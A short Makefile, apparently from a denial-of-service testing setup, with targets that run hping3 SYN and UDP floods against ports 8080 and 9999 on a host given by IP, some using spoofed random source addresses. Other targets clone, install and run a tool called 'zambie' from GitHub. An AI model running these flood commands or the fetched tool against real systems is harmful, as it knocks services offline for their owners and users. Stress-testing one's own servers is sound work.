hping=/usr/sbin/hping3

data=500

test:
	git pull
	node scenarios.js

tcp_flood:
	sudo $(hping) --data $(data) --syn -w $(data) -p 8080 --flood  $$IP
tcp_flood_random:
	sudo $(hping) --data $(data) --syn -w $(data) -p 8080 --flood --rand-source $$IP

tcp_flood_random_9999:
	sudo $(hping) --data $(data) --syn -w $(data) -p 9999 --flood --rand-source $$IP

udp_flood:
	sudo $(hping) --data $(data) --udp -p 8080 --flood $$IP

udp_flood_random:
	sudo $(hping) --data $(data) --udp -p 8080 --flood --rand-source $$IP

install_zambie:
	git clone https://github.com/zanyarjamal/zambie.git
	chmod 755 -R zambie
	zambie/Installer.sh

run_zambie:
	cd zambie; ./zambie.py

clean:
	rm -rf zambie
